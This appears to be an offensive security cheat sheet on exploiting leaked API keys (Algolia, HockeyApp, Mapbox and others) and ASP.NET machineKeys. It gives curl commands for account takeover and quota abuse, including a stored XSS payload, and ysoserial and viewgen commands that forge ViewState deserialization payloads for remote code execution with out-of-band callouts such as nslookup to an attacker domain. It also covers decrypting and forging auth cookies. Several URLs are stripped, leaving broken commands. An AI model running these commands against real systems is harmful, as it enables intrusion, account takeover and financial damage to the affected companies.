The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
- KeyFinder - is a tool that let you find keys while surfing the web!
- Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
Use :
- Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
- Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
curl --request PUT \
--url https://<application-id><example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
curl -sX POST ""
curl ''
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' ''
curl --request GET --url --header 'authorization: Bearer TOKEN'
curl "<your_access_token>"
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c"
That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
- machineKey validationKey and decryptionKey
- __VIEWSTATE cookies
Example of a machineKey from
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Common locations of web.config / machine.config
- 32-bit
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
- 64-bit
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
- in registry when AutoGenerate is enabled (extract with
- HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
- HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
- Exploit with Blacklist3r/AspDotNetWrapper
- Exploit with ViewGen
# --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file
$ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
[+] ViewState is not encrypted
[+] Signature algorithm: SHA1
# --encrypteddata : __VIEWSTATE parameter value of the target application
# --modifier : __VIEWSTATEGENERATOR parameter value
$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> –macdecode
$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode
NOTE: Send a POST request with the generated ViewState to the same endpoint, in Burp you should URL Encode Key Characters for your payload.
$ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>"
$ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"
If you have the machineKey but the viewstate is disabled. Forms Authentication Cookies :
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is sk
, jackpot. If it's pk
or tk
, it's not worth your time.
#Check token validity
curl ""
#Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope)
curl ""
- Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019
- Private API key leakage due to lack of access control - yox - August 8, 2018
- Project Blacklist3r - November 23, 2018 - @notsosecure
- Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020
- Mapbox API Token Documentation